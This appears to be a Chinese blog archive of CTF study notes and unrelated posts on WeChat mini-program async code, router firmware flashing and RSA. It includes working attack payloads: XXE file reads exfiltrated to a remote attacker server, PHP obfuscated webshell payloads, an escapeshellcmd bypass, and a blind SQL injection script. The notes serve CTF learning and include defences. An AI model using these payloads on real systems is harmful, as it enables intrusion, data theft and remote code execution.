linux@Extrader:/var/www/html$ cat /flag   # 连接文件并打印到标准输出设备上flag{3e23f43-235tg54-2d4t54g-43e3ed23e}linux@Extrader:/var/www/html$ rev /flag   # 将文件内容以字符为单位反序输出}e32de3e34-g45t4d2-45gt532-34f32e3{galflinux@Extrader:/var/www/html$ more /flag  # 显示文件内容，每次显示一屏flag{3e23f43-235tg54-2d4t54g-43e3ed23e}linux@Extrader:/var/www/html$ tail /flag  # 在屏幕上显示指定文件的末尾若干行flag{3e23f43-235tg54-2d4t54g-43e3ed23e}linux@Extrader:/var/www/html$ less /flag  # 分屏上下翻页浏览文件内容flag{3e23f43-235tg54-2d4t54g-43e3ed23e}linux@Extrader:/var/www/html$ head /flag  # 在屏幕上显示指定文件的开头若干行flag{3e23f43-235tg54-2d4t54g-43e3ed23e}linux@Extrader:/var/www/html$ tac /flag   # 将文件以行为单位的反序输出flag{3e23f43-235tg54-2d4t54g-43e3ed23e}linux@Extrader:/var/www/html$ sort /flag  # 将文件进行排序并输出flag{3e23f43-235tg54-2d4t54g-43e3ed23e}linux@Extrader:/var/www/html$ nl /flag    # 在Linux系统中计算文件内容行号     1  flag{3e23f43-235tg54-2d4t54g-43e3ed23e}linux@Extrader:/var/www/html$ hexdump /flag  #显示文件十六进制格式0000000 6c66 6761 337b 3265 6633 3334 322d 35330000010 6774 3435 322d 3464 3574 6734 342d 65330000020 6533 3264 6533 0a7d0000028linux@Extrader:/var/www/html$ cat /fl*flag{3e23f43-235tg54-2d4t54g-43e3ed23e}linux@Extrader:/var/www/html$ cat /fla?flag{3e23f43-235tg54-2d4t54g-43e3ed23e}

绕过escapeshellcmd

测试代码：

    $command = 'dir '.$_POST['dir'];    $escaped_command = escapeshellcmd($command);    var_dump($escaped_command);    file_put_contents('out.bat',$escaped_command);    system('out.bat');?>

执行.bat文件的时候，利用%1a，可以绕过过滤执行命令。

payload

dir=. %1a whoami

${}执行代码

php > ${system('whoami')};extrader\extrader

参考

微信小程序有关异步问题的一些操作

2020-08-13T12:55:31.000Z

方法不唯一，后续有新方法再补上~

Promise 对象

let promise = new Promise(function(resolve, reject) {if (/* 异步操作成功 */){        resolve(value);} else {reject(error);}});promise.then(function(value) { // success}, function(value) { // failure});

关于promise 具体可参考阮老师的Promise 对象

或者直接

return new Promise(function (resolve, reject) {  try{    xxx  }  catch(e){ console.log(e) }}

同步化异步函数

app.js

//app.jsfunction promisify(api) {  return (opt, ...arg) => {    return new Promise((resolve, reject) => {      api(Object.assign({}, opt, { success: resolve, fail: reject }), ...arg)    })  }}App({  request: promisify(wx.request),  getUserInfo: promisify(wx.getUserInfo),  onLaunch: function () {    xxx  },  globalData: { }})

index.js使用

let app = getApp();Page({  showdate: async function(){    let res = await app.request({url:'xxx',,method:'POST',data:{x:0,y:1}})    console.log(res)  }})

Object.assign() 方法用于将所有可枚举属性的值从一个或多个源对象复制到目标对象。它将返回目标对象。

wx.request请求封装

异步

api/index.js封装

const getdata = function (url, data, callback) {  wx.request({      url: url,      data: data,      method: 'GET',      header: {        'Content-Type': 'application/json'      },      success: function (res) {        return typeof callback == "function" && callback(res.data)      },      fail: function (res) {        return typeof callback == "function" && callback(false)      }  })}const postdata = function (url, data, callback) {  wx.request({      url: url,      data: data,      method: 'POST',      header: {        'Content-Type': 'application/x-www-form-urlencoded'      },      success: function (res) {        return typeof callback == "function" && callback(res.data)      },      fail: function (res) {        return typeof callback == "function" && callback(false)      }  })}module.exports = {  getdata,  postdata}

app.js引入

const api = require('./api/indexApp({  onLaunch: function () {    xxx  },  globalData: {    api  }})

index.js使用

const app = getApp();const api = app.globalData.apiPage({  api.getdata("xxx", {},  function (res) {    console.log(res);  });  api.postdata("xxx", {x:0,y:1},  function (res) {    console.log(res);  });})

同步

app.js引入

function promisify(api) {  return (opt, ...arg) => {    return new Promise((resolve, reject) => {      api(Object.assign({}, opt, { success: resolve, fail: reject }), ...arg)    })  }}App({  request: promisify(wx.request)})

index.js使用

const app = getApp();Page({  showdate: async function(){    let res = await app.request({url:'xxx',method:'GET'})    console.log(res);  })})

参考

XXE学习笔记

2020-08-11T02:06:34.000Z

XPath注入

XPath注入对象是一个存储数据的XML文件

环境搭建

index.xml

<root>    <users>         <user>             <id>1id>            <username>rootusername>            <password>rootpwdpassword>        user>         <user>             <id>2id>            <username>adminusername>            <password>adminpwdpassword>        user>    users>root>

index.php

$xml=simplexml_load_file('index.xml');$name=$_GET['name'];$pwd=$_GET['pwd'];$query="/root/users/user[username/text()='".$name."' and password/text()='".$pwd."']";echo $query;$result=$xml->xpath($query);if($result){    echo 'Welcome
';    foreach($result as $key=>$value){        echo '
ID:'.$value->id;        echo '
Username:'.$value->username;    }}?>

直接注入

payload

?name=' or 1=1 or ''='&pwd=1，结果如下，类似sql注入，绕过了xml查询

盲注

payload

有返回结果则为正确

推测根节点数，有返回结果则说明只有一个根节点' or count(/*) = 1 or '1' = '2  猜解一级节点' or substring(name(/*[position() = 1]),1,1)='r' or '1'='2  ' or substring(name(/*[position() = 1]),1,1)='o' or '1'='2  ......推测root的下一级节点数' or count(/root/*) = 1 or '1' = '2猜解root的下一级节点' or substring(name(/root/*[position() = 1]),1,1)='u' or '1'='2' or substring(name(/root/*[position() = 1]),1,1)='s' or '1'='2......猜解节点中的数据' or /root/users/user[1]/username[contains(text(),'r')] or '1'='2  ' or /root/users/user[1]/username[contains(text(),'ro')] or '1'='2  ......

/ ：从根节点选取
// ：从匹配选择的当前节点选择文档中的节点，而不考虑它们的位置
. ：选取当前节点
.. ：选取当前节点的父节点

XML外部实体注入(XXE)

XXE漏洞发生在应用程序解析XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件和代码，造成任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等危害。
XXE漏洞触发的点往往是可以上传xml文件的位置，没有对上传的xml文件进行过滤，导致可上传恶意xml文件。

XXE的造成与PHP版本无关，与libxml库的版本有关。libxml <= 2.9.0中，默认启用了外部实体，libxml>2.9.0中默认仅用了外部实体。XXE并不是直接由libxml库造成的，libxml库提供了一些XML核心功能，包括禁用外部实体的libxml_disable_entity_loader()函数，SimpleXML库提供了解析XML的函数，SimpleXML库依赖于libxml库。

本地测试环境php.4.45 libxml = 2.7.8

外部实体可支持http、file等协议。不同程序支持的协议不同

读取任意文件

有回显

xxe.php

$xml = simplexml_load_string($_REQUEST['xml']);print_r($xml);?>

payload

DOCTYPE xxe [<!ELEMENT name ANY >]><root><name>&file;name>root>

url编码后给传入，即在 xml 中 &file ; 变成了外部文件qwzf.txt中内容，导致敏感信息泄露。

无回显

xxe.php

$xml = simplexml_load_string($_REQUEST['xml']);// print_r($xml);?>

这种情况就需要将数据发送到远程服务器(攻击服务器)

payload

传入的xml 两种方式

DOCTYPE test[%dtd;%send;]>另一种方式DOCTYPE root[%dtd;]>

远程服务器的xxe.dtd文件 两种方式

% send SYSTEM 'http://172.18.104.218/?content=%file;'>">%payload;另一种方式：% send SYSTEM 'http://172.18.104.218:5000/?content=%file;'>">%int;%send;

将xml进行url编码后传入

再查看远程服务器的apache日志文件

cat /var/log/apache2/access.log

nc -lvp 5000 端口监听

解码后即是文件的内容

攻击流程

先调用%dtd，请求远程服务器(攻击服务器)上的evil.dtd。
再调用 evil.dtd中的 %file。%file 获取受攻击的服务器上面的敏感文件，然后将 %file 的返回结果传到%send 。
然后调用 %send; 把读取到的数据发送到远程服务器上。

系统命令执行

在安装expect扩展的PHP环境里执行系统命令，其他协议也有可能可以执行系统命令。

DOCTYPE xxe [<!ELEMENT name ANY >]><root><name>&xxe;name>root>

通过XXE可以实现RCE的实例很少。

拒绝服务攻击(Dos)

   DOCTYPE lolz [<!ENTITY lol "lol"><!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"><!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"><!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"><!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"><!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"><!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"><!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"><!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">]><lolz>&lol9;lolz>

原理：递归引用,lol 实体具体还有 “lol” 字符串，然后一个 lol2 实体引用了 10 次 lol 实体，一个 lol3 实体引用了 10 次 lol2 实体，此时一个 lol3 实体就含有 10^2 个 “lol” 了，以此类推，lol9 实体含有 10^8 个 “lol” 字符串,最后再引用lol9。

探测内网端口

DOCTYPE xxe [<!ELEMENT name ANY >]><root><name>&xxe;name>root>

漏洞防御

使用开发语言提供的禁用外部实体的方法

php:

libxml_disable_entity_loader(true);

java:

DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferences(false);

Python:

from lxml import etreexmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

过滤用户提交的XML数据

过滤关键字：<\!DOCTYPE和<\!ENTITY，或者SYSTEM和PUBLIC。

不允许XML中含有自己定义的DTD

栗子

[NCTF2019]True XML cookbook

界面：

题目提示xml，推测是xxe，于是login抓包，发现提交username和password是以一个xml格式的数据提交的，如下：

<user><username>adminusername><password>123456password>user>

于是进行xxe注入测试：

DOCTYPE xxe [<!ELEMENT name ANY >]><user><username>&file;username><password>aaapassword>user>

回显/etc/passwd的内容，存在xxe注入，尝试读取文件，得到doLogin.php的代码

/*** autor: c0ny1* date: 2018-2-7*/$USERNAME = 'admin'; //账号$PASSWORD = '024b87931a03f738fff6693ce0a78c88'; //密码$result = null;libxml_disable_entity_loader(false);$xmlfile = file_get_contents('php://input');try{$dom = new DOMDocument();$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);$creds = simplexml_import_dom($dom);$username = $creds->username;$password = $creds->password;if($username == $USERNAME && $password == $PASSWORD){$result = sprintf("%d%s",1,$username);}else{$result = sprintf("%d%s",0,$username);}}catch(Exception $e){$result = sprintf("%d%s",3,$e->getMessage());}header('Content-Type: text/html; charset=utf-8');echo $result;?>

测试读取flag，硬是没找到，无法命令执行，网上找了找wp，放心居然是内网探测，读取/etc/hosts的文件，读到本机ip地址173.56.110.9，于是探测子网：

DOCTYPE xxe [<!ELEMENT name ANY >]><user><username>&file;username><password>aaapassword>user>

173.56.110.11，返回flag

参考

PHP无字母数字RCE

2020-08-09T04:22:50.000Z

CTF有时会碰到这种类型题，故在这里总结一下，日后有新的操作再补上

利用条件：eval($_GET['exp']);

限制条件：preg_match('[a-z0-9]/is', $exp)

测试代码如下：

    if(!preg_match('/[a-z0-9]/is',$_GET['exp'])) {  eval($_GET['exp']);}

取反

php版本：PHP Version 7.2.24-0

exp

echo urlencode(~'exp');

payload

echo urlencode(~'phpinfo'); (~%8F%97%8F%96%91%99%90)();  ==>  phpinfo();echo urlencode(~'assert');echo urlencode(~'(eval($_POST["a"]))');(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%DD%9E%DD%A2%D6%D6);  ==>  assert('eval($_POST["a"])')

测试结果如下

异或

php版本：PHP Version 7.2.24-0

exp

// 跑出非字母数字异或得到的 $str$str = 'GET';$exp1 = '';$exp2 = '';for ($k = 0; $k < strlen($str); $k++) {    $flag = 0;    for ($i = 0; $i < 128; $i++) {        if (($i >= 48 && $i <= 57) || ($i >= 65 && $i <= 90) || ($i >= 97 && $i <= 122)) {            continue;        }        for ($j = 0; $j < 128; $j++) {            if (($j >= 48 && $j <= 57) || ($j >= 65 && $j <= 90) || ($j >= 97 && $j <= 122)) {                continue;            }            if ((chr($i) ^ chr($j)) === $str[$k]) {                $exp1 = $exp1.urlencode(chr($i));                $exp2 = $exp2.urlencode(chr($j));                $flag = 1;                break;            }        }        if($flag === 1){            break;        }    }}echo $exp1.'^'.$exp2."\n";

payload

${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=phpinfo==>  phpinfo()    ${%fe%fe%fe%fe^%a1%b9%bb%aa}[_](${%fe%fe%fe%fe^%a1%b9%bb%aa}[__]);&_=assert&__=eval($_POST[%27a%27])==>  assert("eval($_POST['a'])")

测试结果如下

类似的

$_ = "!((%)("^"@[[@[\\";   //构造出assert$__ = "!+/(("^"~{`{|";   //构造出_POST$___ = $$__;   //$___ = $_POST$_($___[_]);   //assert($_POST[_]);

自增

payload

$_=[].[]; //俩数组拼接强行返回ArrayArray,这里一个短杠的值也就是ArrayArray$__='';  //两个短杠赋值为空$_=$_[''];//从arrayarray中取首字符，即a。这里$_=$_[0]也是一样的道理，不过waf限制数字输入$_=++$_; //b$_=++$_; //c$_=++$_; //d$_=++$_; //e$__.=$_; //E  把两个短杠赋值为E$_=++$_; //F  一个短杠继续自增$_=++$_; //G $__=$_.$__; // GE  一个短杠自增变成了G，两个短杠在前面第十一行处已经赋值为E，拼接得GE$_=++$_; //H 此处一个短杠继续自增，为H$_=++$_; //I$_=++$_; //J$_=++$_; //k$_=++$_; //L$_=++$_; //M$_=++$_; //N$_=++$_; //O$_=++$_; //P$_=++$_; //Q$_=++$_; //R$_=++$_; //S$_=++$_; //T$__.=$_; // GET 在此处，两条短杠原是GE与一条短杠（已经自增为T），.=拼接，构成get${'_'.$__}[_](${'_'.$__}[__]); // 进行拼接，$_GET['_']($_GET['__']);url编码后：%24_%3d%5b%5d.%5b%5d%3b%24__%3d%27%27%3b%24_%3d%24_%5b%27%27%5d%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24__.%3d%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24__%3d%24_.%24__%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24__.%3d%24_%3b%24%7b%27_%27.%24__%7d%5b_%5d(%24%7b%27_%27.%24__%7d%5b__%5d)%3b

$_=[];$_=@"$_"; // $_='Array';$_=$_['!'=='@']; // $_=$_[0];$___=$_; // A$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__; // S$___.=$__; // S$__=$_;$__++;$__++;$__++;$__++; // E $___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T$____.=$__;$_=$$____;$___($_[_]); // ASSERT($_POST[_]);url编码后：%24_%3d%5b%5d%3b%24_%3d%40%22%24_%22%3b%24_%3d%24_%5b%27!%27%3d%3d%27%40%27%5d%3b%24___%3d%24_%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24___.%3d%24__%3b%24___.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24___.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24___.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24___.%3d%24__%3b%24____%3d%27_%27%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24____.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24____.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24____.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24____.%3d%24__%3b%24_%3d%24%24____%3b%24___(%24_%5b_%5d)%3b

注意这两个payload利用的话要php版本小于7才能成功利用，

php5中assert是一个函数，我们可以通过$f='assert';$f(...);这样的方法来动态执行任意代码。
但php7中，assert不再是函数，变成了一个语言结构（类似eval），不能再作为函数名动态执行代码，所以利用起来稍微复杂一点。但也无需过于担心，比如我们利用file_put_contents函数，同样可以用来getshell。

测试结果如下

短标签

PHP中有两种短标签，和。其中，相当于对的替换。而则是相当于.

例如：

'whoami'?>  //输出  whoami`whoami`?>  //输出  命令执行后的结果

PHP中POST上传文件会把我们上传的文件暂时存在/tmp文件夹中，默认文件名是/tmp/phpXXXXXX，文件名最后6个字符是随机的大小写字母。

尝试生成执行的文件，payload：

. /???/????????[@-[]

最后的[@-[]表示ASCII在@和[之间的字符，也就是大写字母，所以最后会执行的文件是tmp文件夹下结尾是大写字母的文件。

exp数据包

POST /?exp=?> HTTP/1.1Host: xxxxxx:2333User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type:multipart/form-data;boundary=--------123Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Length: 106----------123Content-Disposition:form-data;name="file";filename="1.txt"echo " success.php----------123--

即可getshell

拿flag的话还可以使用通配符

code=?>`/???/??? /????`?>

其中/???/??? /????匹配/bin/cat /flag，这样也能得到flag

参考

路由器折腾小记

2020-08-06T04:27:18.000Z

本文记录我（纯小白）这几天折腾路由器的大致过程，备忘用

物色路由器

因为从来没玩过，而且家里好几年前的路由器是时候改换了，于是就准备换台，当初只是单纯的想换台路由器提升提升家里的WiFi信号的网速，都已经在jd上选好了一台水星的，但因为一直在学校迟迟没有买，后来发现了路由器的各种玩法，刷固件fq，解锁某云灰色music之类的，就开始在网上各种资料和固件，也慢慢的在物色一款路由器（原来选中的水星的那个网上资料少，官方好像不支持固件切换），一直在小米和newifi3之间徘徊，最后选择了联想的newifi3，结果无线翻车了，现在后悔了当时为什么没有看到k2p，┭┮﹏┭┮，无线信号是真的差，刷了openwrt后居然赶不上我家原来的老路由器，心态炸了。。。

但是。。。炸归炸，用还是有用的，虽然无线不咋地，当其他方面用用可以的，支持usb，512M的内存

刷不死breed

先下好不死breed固件，这个网上很多

然后本地搭一个web服务器，把文件放上面，然后在路由器终端了里就可以用wget下载了

ssh root@192.168.99.1cd /tmpwget http://xxx.xxx.xxx.xxx/newifi-d2-jail-break.koinsmod newifi-d2-jail-break.ko

随后SSH 会停止响应，因为 newifi-d2-jail-break.ko 会冻结系统的其他功能，强制写入 Newifi D2 专用版 Breed 到 Flash

然后把路由器电源拔了之后按住reset按钮再插上电源直到只有电源等开始闪烁再松开电源，浏览器输入192.168.1.1即可进入breed web管理界面，再在这里面将原来的eeprom和编程器备份一下，再刷入自己想要的第三方固件（bin文件）

刷这个breed的原因是因为我们在刷第三方固件的时候如果没操作好，固件切换出了差错的话，路由器就变砖了，为了避免这种情况，就有大神做出了这个breed，相当于一个uboot引导加载程序

刷第三方固件

这里我试了好几个，最后选择了esir大神的openwrt固件，这里可以下载： https://openwrt.club/dl

选择里面的openwrt-ramips-mt7621-d-team_newifi-d2-squashfs-sysupgrade.bin文件刷入后等待路由器重启，重启完成后输入192.168.1.1即可进入openwrt管理界面

刷openclash

下载地址 https://github.com/vernesong/OpenClash/releases

下好ipk文件，ssh连上路由器，执行以下命令

cd /tmp opkg updateopkg install coreutils-nohup bash iptables dnsmasq-full curl jsonfilter ca-certificates ipset ip-full iptables-mod-tproxywget https://github.com/vernesong/OpenClash/releases/download/v0.39.6-beta/luci-app-openclash_0.39.6-beta_all.ipkopkg install luci-app-openclash_0.39.6-beta_all.ipk

然后刷新一下页面就可以在服务里面看到openclash了，剩下的配置工作就要自己操作了

另外这个版本的自带解锁网易云灰色音乐的功能，直接开启就可以了

自己编译openwrt

注意：

不要用 root 用户来 git 和编译！！！
国内用户编译前最好准备好梯子
默认登陆IP 192.168.1.1, 密码 password

需要Ubuntu 18 LTS x64环境

sudo apt-get updatesudo apt-get -y install build-essential asciidoc binutils bzip2 gawk gettext git libncurses5-dev libz-dev patch python3.5 python2.7 unzip zlib1g-dev lib32gcc1 libc6-dev-i386 subversion flex uglifyjs git-core gcc-multilib p7zip p7zip-full msmtp libssl-dev texinfo libglib2.0-dev xmlto qemu-utils upx libelf-dev autoconf automake libtool autopoint device-tree-compiler g++-multilib antlr3 gperf

然后下载openwrt的源代码

git clone https://github.com/Lienol/openwrtcd openwrt/packagegit clone https://github.com/kenzok8/openwrt-packages.gitcd .../scripts/feeds clean./scripts/feeds update -a./scripts/feeds install -amake menuconfig

然后就是配置编译选项了

如果是newifi3则：Target System选择 "MediaTek Ralink MIPS"Subtarget选择"MT7621"Target Profile选择"Newifi D2"

我们希望有web界面，还需在LuCI ---> Collections选项中选上luci

在LuCI ---> Applications选择要添加的插件应用。

在LuCI ---> Themes中设置要安装的主题。

make -j8 download v=s 下载dl库

输入 make -j1 V=s （-j 后面的数字1是线程数。第一次编译推荐用单线程）即可开始编译你要的固件了。

编译完成后输出路径：openwrt/bin/targets

第二次编译：

cd ledegit pull./scripts/feeds update -a && ./scripts/feeds install -amake defconfigmake -j8 downloadmake -j$(($(nproc) + 1)) V=s

如果需要重新配置：

rm -rf ./tmp && rm -rf .configmake menuconfigmake -j$(($(nproc) + 1)) V=s

参考

CTFSHOW-WEB_AK赛

2020-08-03T13:10:31.000Z

在菜鸡的道路上越走越远。。。淦！

签到_观己

if(isset($_GET['file'])){    $file = $_GET['file'];    if(preg_match('/php/i', $file)){        die('error');    }else{        include($file);    }}else{    highlight_file(__FILE__);}?>

?file=/flag.txt直接出答案。。这算个非预期解吧

另外的解法：文件包含Nginx日志文件、

?file=/var/log/nginx/access.log可读日志文件内容，里面包含用户访问的UA信息

于是

尝试命令执行

随后cat /flag.txt即可

Web1_观字

题目给出源码

#flag in http://192.168.7.68/flagif(isset($_GET['url'])){    $url = $_GET['url'];    $protocol = substr($url, 0,7);    if($protocol!='http://'){        die('仅限http协议访问');    }    if(preg_match('/\.|\;|\||\<|\>|\*|\%|\^|\(|\)|\#|\@|\!|\`|\~|\+|\'|\"|\.|\,|\?|\[|\]|\{|\}|\!|\&|\$|0/', $url)){        die('仅限域名地址访问');    }    system('curl '.$url);}

payload：/?url=http://192。168。7。68/flag

原因是curl中可以用。替换.

另外，ip可以使用十进制进行访问，即http://3232237380/flag，但题目过滤了0

Web2_观星

url可以给id传值，当传入一个引号的时候回显enheng?，推测sql注入

FUZZ测试发现过滤了以下的内容（长度为533的）

未过滤^，考虑布尔盲注

payload：

id=1^case(ord(substr((database())from({0})for(1))))when({1})then(2)else(3)end.format(i,j)

过滤了逗号，if无法使用则用case...when...then...else...end代替绕过，substr中的逗号用substr(...from...for...)代替绕过

接下来就可以写脚本了

import requestsurl = 'http://dc894a39-ba77-4e9f-9201-e52d7a19ba5c.chall.ctf.show/index.php?id=1^'# payload = 'case(ord(substr((database())from({0})for(1))))when({1})then(2)else(3)end'   web1# payload = 'case(ord(substr((select(group_concat(table_name))from(information_schema.tables)where((table_schema)regexp(database())))from({0})for(1))))when({1})then(2)else(3)end'    flag,page,user# payload = 'case(ord(substr((select(group_concat(column_name))from(information_schema.columns)where((table_name)regexp(0x666C6167)))from({0})for(1))))when({1})then(2)else(3)end'    FLAG_COLUMN,flagpayload = 'case(ord(substr((select(flag)from(flag))from({0})for(1))))when({1})then(2)else(3)end'flag = ''for i in range(1, 128):    for j in range(38, 126):        urls = url+payload.format(i, j)        request = requests.get(urls)        if 'I asked nothing' in request.text:            flag += chr(j)            print(flag)            break

Web3_观图

showImage.php可看到源码

//$key = substr(md5('ctfshow'.rand()),3,8);//flag in config.phpinclude('config.php');if(isset($_GET['image'])){    $image=$_GET['image'];    $str = openssl_decrypt($image, 'bf-ecb', $key);    if(file_exists($str)){        header('content-type:image/gif');        echo file_get_contents($str);    }}else{    highlight_file(__FILE__);}?>

图片链接为/showImage.php?image=Z6Ilu83MIDw=

可以看到图片文件名是Z6Ilu83MIDw=经过bf-ecb算法用$key得到的，再看$key的生成方式

substr(md5('ctfshow'.rand()),3,8);

查询rand()函数，若里面的参数为空，则返回0到getrandmax()之间的伪随机整数

getrandmax()函数返回随机数可能返回的最大值，既然有上限即可进行爆破来得出key值

脚本如下：

    for($i=0;$i<getrandmax();$i++){        $key = substr(md5('ctfshow'.$i),3,8);  //5a78dbb4        $image="Z6Ilu83MIDw=";        $str = openssl_decrypt($image, 'bf-ecb', $key);        if(strpos($str,"gif") or strpos($str,"jpg") or strpos($str,"png")){            print($str."\n");            print($i."\n");            print($key."\n");            break;        }    }    $flag = openssl_encrypt('config.php', 'bf-ecb', '5a78dbb4');    print($flag);

得到N6bf8Bd8jm0SpmTZGl0isw==，为config.php加密后的base64码，访问/showImage.php?image=N6bf8Bd8jm0SpmTZGl0isw==，F12打开复制代码base64解密得到config.php的内容，flag即在其中。

Web4_观心

抓包发现有api.php文件，并且带有请求api和city两个数据

api携带的是一个网址，是一个xml文件，由此判断考的应该是XXE外部实体注入

于是构建攻击环境

在公网服务器上编写两个文件

xxe.xml

DOCTYPE root[%dtd;]><root><user>woojayuser><pass>passwordpass>root>

xxe.dtd

">%int;%send;

随后在服务器上监听5000端口，即可得到flag.txt的 base64编码后的结果，解码既是flag

不监听端口也可以，直接发包请求，会把报错的结果返回，如下：

XXE这块不是很了解，原理后面再仔细研究一下

RSA算法浅析

2020-08-01T14:08:36.000Z

数论知识

互质：如果两个正整数，除了 1 以外没有其他的公因数，则他们互质。比如，14 和 15 互质。注意，两个数构成互质关系，他们不一定需要是质数，比如 7 和 9。
